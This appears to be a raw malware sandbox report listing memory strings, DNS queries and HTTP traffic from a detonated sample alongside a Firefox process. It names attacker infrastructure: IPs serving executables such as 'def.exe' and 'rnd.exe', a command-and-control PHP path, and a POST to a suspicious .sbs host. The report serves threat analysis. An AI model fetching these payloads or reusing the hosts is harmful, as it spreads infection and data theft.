"*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.2959811201.000002348985B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/URIFixup.sys.mjshttp://www.inbox.lv/rfc2368/?value=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/JSONFile.sys.mjsCan't invoke URIFixup in the content process_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/uriloader/web-handler-app;1gecko.handlerService.defaultHandlersVersionhttps://mail.inbox.lv/compose?to=%sMust have a source and a callback@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/handler-service;1@mozilla.org/uriloader/handler-service;1pdfjs.previousHandler.preferredActionVALIDATE_DONT_COLLAPSE_WHITESPACEresource://gre/modules/Integration.sys.mjspdfjs.previousHandler.alwaysAskBeforeHandling equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000019.00000003.2840171314.000002348F1FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 2235d4f703.exe, 0000000B.00000003.3006270290.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/OT
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/hT
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3002813792.00000000013FD000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3009828676.000000000139C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 2235d4f703.exe, 0000000B.00000003.3002813792.00000000013FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe;Q4
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exesi
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3002813792.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3006270290.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 2235d4f703.exe, 0000000B.00000003.3002813792.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3006270290.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeN
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.00000000006AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp, 86526d7b20.exe, 0000000A.00000002.2688574615.00000000006AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php)=1
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9&T
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi&
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/v=
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exe
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exeO
Source: 2235d4f703.exe, 00000009.00000003.2859665308.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exes
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/NetUtil.sys.mjs
Source: 2235d4f703.exe, 00000009.00000003.2689912258.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2688046289.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2686826837.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685819613.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687374958.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685489848.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2692244836.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2656642315.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687234574.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2688669064.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2687820469.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689461786.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2715582287.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684931089.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684409963.0000000001223000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2689623976.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2691008602.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2688360776.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685083573.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2685660579.0000000001224000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2684773955.0000000001224000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft4
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.2972813755.000002348A425000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000003.2809785226.000002348FB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3027734740.000002348AC66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000019.00000003.2847893186.000002348E81C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000019.00000003.2846711290.000002348E82B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2911640090.000002348E640000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledresource://gre/modules/ReaderMode.sys.mjs
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
